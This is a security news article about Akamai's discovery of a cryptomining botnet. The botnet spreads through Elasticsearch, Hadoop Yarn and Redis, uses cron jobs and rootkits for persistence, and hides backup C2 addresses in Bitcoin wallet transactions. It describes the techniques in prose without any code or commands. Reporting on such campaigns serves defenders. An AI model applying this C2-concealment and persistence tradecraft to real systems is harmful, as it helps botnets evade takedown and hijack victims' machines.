Akamai security team has found a new campaign where botnet developers are abusing Bitcoin’s blockchain transactions to hide their C2’s IP addresses. The botnet is aimed at mining cryptocurrencies for the makers and would use Bitcoin wallet address, its blockchain API, and bash one-liners to infect and recover their infected systems into the network.
A Blockchain Abusing Botnet
Botnets are often used for various purposes like deploying DDoS attacks or mining cryptocurrencies, and they need to be connected to the hacker’s C2 for receiving commands for performing the desired action as above. These connections are crucial, as they’re the major vectors of target by the security professionals and law enforcement to take down the botnet networks.
Tracking them is possible through the IP addresses they have, which eventually shows the server’s location and sometimes the transmission data and commands. Thus, white hats often indulge in finding these IP addresses of hacker’s C2 in their work. But, this can be a difficult job if the hacker setup backup C2 servers.
This is being practiced by a botnet group as tracked by Akamai researchers, who detailed the campaign starts with exploiting the RCE vulnerabilities in Elasticsearch or Hadoop Yarn. They then deploy scripts to install Redis server scanners and find additional Redis targets.
The Mechanism For Persistence
This helps them to install Skidmap mining malware for mining cryptocurrencies, and kill existing miners, modify SSH keys, and even disable security features. Cron jobs and rootkits are being used to maintain persistence. But, to regain the lost hosts in the network, authors should connect their bots to a domain or a static IP address.
And this is what targeted easily by security forces to help them take down the botnet. Thus, the authors of this campaign are found to be set up a backup C2 and update the hosts to connect them to their new (backup) C2. Researchers discovered a BTC wallet address, a URL for a wallet-checking API, and four bash one-liners.
All these are helping them to switch to a new C2 server for persistence. As they wrote, the wallet data is being fetched by the API to calculate an IP address, which is the new (backup) C2’s address. This method helps them to store (and also obfuscate) the configuration data on the blockchain.
They explained, “By pushing a small amount of BTC into the wallet, they can recover infected systems that have been orphaned,” Akamai says. “They essentially have devised a method of distributing configuration information in a medium that is effectively unseizable and uncensorable.“
This technique is great, but still has some room to develop, say researchers. Though they didn’t explain where the authors can improve, they concluded that the makers have made more than $30,000 worth Monero to date using this system.